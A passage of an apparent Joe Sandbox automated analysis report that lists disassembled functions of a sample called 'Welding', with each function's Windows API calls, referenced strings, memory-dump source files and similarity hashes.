Part of subcall function 000D312D: __wcsicmp_l.LIBCMT ref: 000D31B6

Strings

.dll, xrefs: 0013BEDF
.exe, xrefs: 0013BEBC
.icl, xrefs: 0013BE9C

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 0a35c6b028f1e0b60565c0782ce5fe0e318f9e77d57c492427c3f21a9987027c
Instruction ID: b06f8e9eeb33e6a6a43661ec18b0c874b4225f191fe5846a45fee0df559def11
Opcode Fuzzy Hash: 0a35c6b028f1e0b60565c0782ce5fe0e318f9e77d57c492427c3f21a9987027c
Instruction Fuzzy Hash: 3C61E075500219FAEB18DF64CC82BFE77ACEF08711F10421AFA15E61D1DB74AA90DBA0

Function 0011E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0011E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 0011E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0011E33B
__wsplitpath.LIBCMT ref: 0011E399
_wcscat.LIBCMT ref: 0011E3B1
_wcscat.LIBCMT ref: 0011E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0011E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0011E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 0011E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 0011E43F
_wcscpy.LIBCMT ref: 0011E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0011E48A

Strings

*.*, xrefs: 0011E445

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
Instruction ID: 12d8ca946090ff4fe4756de4bb6e647c7a5a98e483cb6035c3cd219f41570833
Opcode Fuzzy Hash: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
Instruction Fuzzy Hash: 3E6128755047459FC714EFA0C885ADEB3E8BF89310F04892EF98987252DB35EA85CB92

Function 0011A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A2C2

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0011A2E3
__swprintf.LIBCMT ref: 0011A33C
__swprintf.LIBCMT ref: 0011A355
_wprintf.LIBCMT ref: 0011A3FC
_wprintf.LIBCMT ref: 0011A41A

Strings

"%s" (%d) : ==> %s:, xrefs: 0011A415
Line %d (File "%s"):, xrefs: 0011A336, 0011A34F
Incorrect parameters to object property !, xrefs: 0011A39E
^ ERROR , xrefs: 0011A391
Error: , xrefs: 0011A3C4
"%s" (%d) : ==> %s:%s%s, xrefs: 0011A3F7

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 83ec7cbd0bdfe239d274f63829166a4a3546ed374fc5f4737a12493dba8e0795
Instruction ID: 3cb8be129e934b2cfd949ff95a49bf60830cdc82ed8b175fc96fa8ce7107a6b2
Opcode Fuzzy Hash: 83ec7cbd0bdfe239d274f63829166a4a3546ed374fc5f4737a12493dba8e0795
Instruction Fuzzy Hash: FE51B171900209AACF19EBE0CD46EEEB778EF09340F500169F505B20A3EB316F99CB61

Function 00110065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,?,?,000FF8B8,00000001,0000138C,00000001,?,00000001,?,00123FF9,?), ref: 0011009A
LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100A3

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

GetModuleHandleW.KERNEL32(00000000,00177310,?,00000FFF,?,?,000FF8B8,00000001,0000138C,00000001,?,00000001,?,00123FF9,?,00000001), ref: 001100C5
LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100C8
__swprintf.LIBCMT ref: 00110118
__swprintf.LIBCMT ref: 00110129
_wprintf.LIBCMT ref: 001101D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001101E9

Strings

Line %d:, xrefs: 00110123
Line %d (File "%s"):, xrefs: 00110112
^ ERROR, xrefs: 0011017E
%s (%d) : ==> %s: %s %s, xrefs: 001101CD
Error: , xrefs: 001101A0

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: d3140d768370ea48c28a8bf6d7e65183d7c387ac372dce088d1b713ea20684f2
Instruction ID: 1ad7b79718d04d68622e085e1bba9bf1d45dcbdb55415ab57da3df68f7a3acbf
Opcode Fuzzy Hash: d3140d768370ea48c28a8bf6d7e65183d7c387ac372dce088d1b713ea20684f2
Instruction Fuzzy Hash: BF416172800219AACF15EBD0CD96EEEB778EF19340F500169F505B2093DB75AF99CB61

Function 0011A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC

CharLowerBuffW.USER32(?,?), ref: 0011AA0E
GetDriveTypeW.KERNEL32 ref: 0011AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000, type cdaudio alias cd wait,?,open ), ref: 0011AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000, wait,?,set cd door ), ref: 0011AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000,close cd wait), ref: 0011AB08

Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B

Strings

close, xrefs: 0011AA14
close cd wait, xrefs: 0011AAF3
open , xrefs: 0011AA6A
open, xrefs: 0011AA35
closed, xrefs: 0011AA22, 0011AA2B
set cd door , xrefs: 0011AAA9
wait, xrefs: 0011AAC5
type cdaudio alias cd wait, xrefs: 0011AA86

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 95c73b4e20bbc099028bd5b3096e6c0929780414015cd27c9a5929a0b6794e2c
Instruction ID: f905076323eb6ac7f41cacc17ed4d07033e0e46465a1dc2f2c42d0d12cd7ad06
Opcode Fuzzy Hash: 95c73b4e20bbc099028bd5b3096e6c0929780414015cd27c9a5929a0b6794e2c
Instruction Fuzzy Hash: 395169711083049FC304EF10C981DAAB7F4FF99358F50492DF896972A2DB31AE49CB52

Function 0011A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0011A852
__swprintf.LIBCMT ref: 0011A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 0011A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0011A8D6
_memset.LIBCMT ref: 0011A8F5
_wcsncpy.LIBCMT ref: 0011A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0011A966
CloseHandle.KERNEL32(00000000), ref: 0011A971
RemoveDirectoryW.KERNEL32(?), ref: 0011A97A
CloseHandle.KERNEL32(00000000), ref: 0011A984

Strings

:, xrefs: 0011A895
\??\%s, xrefs: 0011A86E
\, xrefs: 0011A88A

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
Instruction ID: a0dec8bbbd770eaf1d1f6d36f7b059e26c80e9b2f7225803c9ddd188f33ca56a
Opcode Fuzzy Hash: 0a9457742002b88543ea7cd5e951ef5d57da2f472ed6cea8c81701b02e38f9f4
Instruction Fuzzy Hash: FA31A375900219ABDB219FA1DC49FEB77BCEF89700F5041B6F609D21A1E77096C48B25

Function 000EAAFB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 000EAB5B
___wtomb_environ.LIBCMT ref: 000EAB7D

Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58

__malloc_crt.LIBCMT ref: 000EABA5
__malloc_crt.LIBCMT ref: 000EABC2
_free.LIBCMT ref: 000EABF9
__recalloc_crt.LIBCMT ref: 000EAC32
__recalloc_crt.LIBCMT ref: 000EAC77
_strlen.LIBCMT ref: 000EACA3
__calloc_crt.LIBCMT ref: 000EACAD
_strlen.LIBCMT ref: 000EACBC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 000EACEA
_free.LIBCMT ref: 000EAD04
_free.LIBCMT ref: 000EAD11
_free.LIBCMT ref: 000EAD23
__invoke_watson.LIBCMT ref: 000EAD3D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 131c88200029404fd37865c2ae7b9d0bdcf69cac13cd98ee65aa4eb090060d64
Instruction ID: a6884a91a3aef2d4c293076790160c6cd98a3b254898d26ab7f18bea6ac188cc
Opcode Fuzzy Hash: 131c88200029404fd37865c2ae7b9d0bdcf69cac13cd98ee65aa4eb090060d64
Instruction Fuzzy Hash: F4611A71A053419FEB215F25DC41BAE77F9EF5A322F204126E805BB2D2DB74EC818762

Function 0013C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filememorywindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0013C0C8
GetFileSize.KERNEL32(00000000,00000000), ref: 0013C0DF
GlobalAlloc.KERNEL32(00000002,00000000), ref: 0013C0EA
CloseHandle.KERNEL32(00000000), ref: 0013C0F7
GlobalLock.KERNEL32(00000000), ref: 0013C100
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0013C10F
GlobalUnlock.KERNEL32(00000000), ref: 0013C118
CloseHandle.KERNEL32(00000000), ref: 0013C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0013C130
#418.OLEAUT32(?,00000000,00000000,00143C7C,?), ref: 0013C149
GlobalFree.KERNEL32(00000000), ref: 0013C159
GetObjectW.GDI32(?,00000018,000000FF), ref: 0013C17D
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0013C1A8
DeleteObject.GDI32(00000000), ref: 0013C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0013C1E6

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$#418AllocCopyDeleteFreeImageLockMessageReadSendSizeStreamUnlock
String ID:
API String ID: 2779716855-0
Opcode ID: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
Instruction ID: dfd7cd167d9131092d21947eb118ad0cf794975355ffcafeb04f07695f3f9afa
Opcode Fuzzy Hash: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
Instruction Fuzzy Hash: DB413D79500205EFDB229F65DC4CEAE7BB8EF8A721F104058FA05E7660D7719D81DBA0

Function 0011DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0011E053
_wcscat.LIBCMT ref: 0011E06B
_wcscat.LIBCMT ref: 0011E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0011E092
SetCurrentDirectoryW.KERNEL32(?), ref: 0011E0A6
GetFileAttributesW.KERNEL32(?), ref: 0011E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 0011E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0011E0EA

Strings

*.*, xrefs: 0011E129

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: fde5adf678fd13bf75ad5933ad4ef02e29798ca5d7a23344566c1c3e359bb185
Instruction ID: 85355b222f7848562615881d7ffee5e187487d530a260ea24fe3024a98a97371
Opcode Fuzzy Hash: fde5adf678fd13bf75ad5933ad4ef02e29798ca5d7a23344566c1c3e359bb185
Instruction Fuzzy Hash: 0B8160715043429FC728DF64D8449EEB7E8AB99310F15883EF88AC7251E734EA86CB52

Function 0013C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0013C8A4
GetFocus.USER32 ref: 0013C8B4
GetDlgCtrlID.USER32(00000000), ref: 0013C8BF
_memset.LIBCMT ref: 0013C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0013CA15
GetMenuItemCount.USER32(?), ref: 0013CA35
GetMenuItemID.USER32(?,00000000), ref: 0013CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0013CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0013CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0013CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0013CB31

Strings

0, xrefs: 0013C9E2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 1d3c404bdfada5e8c6db7101c778b2e018c6de4a22a6da72e51e1c5218cc3f57
Instruction ID: 9bfde6f6b23fed54e9d81d5bfe7ccc8900bdf62953fc1362352fc721b3fcaf75
Opcode Fuzzy Hash: 1d3c404bdfada5e8c6db7101c778b2e018c6de4a22a6da72e51e1c5218cc3f57
Instruction Fuzzy Hash: BC817B75208305AFD715CF14C985EABBBE8FF88354F00492DFA99A72A1D730D945CBA2

Function 00108ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73

Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108B2E
_memset.LIBCMT ref: 00108B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108B62
GetLengthSid.ADVAPI32(?), ref: 00108B73
GetAce.ADVAPI32(?,00000000,?), ref: 00108BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00108BCC
GetLengthSid.ADVAPI32(?), ref: 00108BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00108BF8
HeapAlloc.KERNEL32(00000000), ref: 00108BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108C20
CopySid.ADVAPI32(00000000), ref: 00108C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108C92

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
Instruction ID: fbb3d0118b015825da81d5abb87f128457632d79e4caf4054ac878e4f5804654
Opcode Fuzzy Hash: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
Instruction Fuzzy Hash: 58615A75904209AFDF11DF91DD44EEEBB79FF19300F048169FA95A72A0DBB19A00CB60

Function 00127A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00127A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00127A85
CreateCompatibleDC.GDI32(?), ref: 00127A91
SelectObject.GDI32(00000000,?), ref: 00127A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00127AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00127B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00127B52
SelectObject.GDI32(00000006,?), ref: 00127B5A
DeleteObject.GDI32(?), ref: 00127B63
DeleteDC.GDI32(00000006), ref: 00127B6A
ReleaseDC.USER32(00000000,?), ref: 00127B75

Strings

(, xrefs: 00127AFA

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: d1463ccc92ab806e117a056d6880422a40e7bb18d576dc35f91f35f00885b202
Instruction ID: 13e611234c48bf7b59ea2d2ce04b5100d00a6894c709ffb3904aeaf5cb486140
Opcode Fuzzy Hash: d1463ccc92ab806e117a056d6880422a40e7bb18d576dc35f91f35f00885b202
Instruction Fuzzy Hash: 5A516B75904319EFCB15CFA9DC84EAFBBB9EF49310F14841DFA4AA7260D731A9508B60

Function 0011A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A4D4

Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0011A4F6
__swprintf.LIBCMT ref: 0011A54F
__swprintf.LIBCMT ref: 0011A568
_wprintf.LIBCMT ref: 0011A61E
_wprintf.LIBCMT ref: 0011A63C

Strings

"%s" (%d) : ==> %s:, xrefs: 0011A637
Line %d (File "%s"):, xrefs: 0011A549, 0011A562
^ ERROR, xrefs: 0011A5C0
Error: , xrefs: 0011A5E6
"%s" (%d) : ==> %s:%s%s, xrefs: 0011A619

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
